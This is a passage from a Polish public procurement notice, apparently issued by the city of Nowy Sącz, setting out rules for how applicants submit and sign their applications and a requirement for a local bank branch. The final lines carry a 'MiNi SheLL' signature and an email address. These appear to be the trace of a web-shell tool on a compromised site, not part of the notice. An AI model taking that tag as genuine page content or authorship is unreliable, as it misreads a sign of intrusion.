IV.4.4)1)e) Poza oznaczeniami podanymi wyżej koperta powinna posiadać nazwę i adres wykonawcy, aby można było odesłać wniosek w przypadku stwierdzenia jego opóźnienia
IV.4.4)1)f)	Koszty opracowania i dostarczenia wniosku obciążają wyłącznie wykonawcę
IV.4.4)1)g) 	Wniosek oraz wszystkie załączniki wymagają podpisu osób uprawnionych do reprezentowania wykonawcy w obrocie gospodarczym (osobę/osoby uprawnione do składania cywilnoprawnych oświadczeń woli ze skutkiem zaciągania zobowiązań w imieniu wykonawcy), zgodnie z aktem rejestracyjnym, wymaganiami ustawowymi oraz przepisami prawa
IV.4.4)1)h)	Jeżeli wniosek i załączniki zostaną podpisane przez upoważnionego przedstawiciela wykonawcy - osoba inna niż określona we właściwym odpisie z rejestru - należy dołączyć w formie oryginału lub kopii poświadczonej notarialnie [stosownie do Wyroku Sądu Okręgowego w Warszawie z dnia 31.1.2007 r. (sygn.  akt V Ca 85/07)] właściwe umocowanie prawne do składania cywilnoprawnych oświadczeń woli ze skutkiem zaciągania zobowiązań w imieniu wykonawcy
IV.4.4)1)i) Dla ułatwienia wniosek można sporządzić według wzoru stanowiącego załącznik nr 1 do ogłoszenia zamieszczonego na stronie internetowej: www.nowysacz.pl.  
IV.4.4)1)j)	Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
IV.4.4)2) Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed przystąpieniem do realizacji zamówienia powinien przedłożyć Zamawiającemu oświadczenie, iż zapewni obsługę bankową przy udziale placówki banku położonej na terenie Miasta Nowego Sącza, przez wyznaczonego pracownika banku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com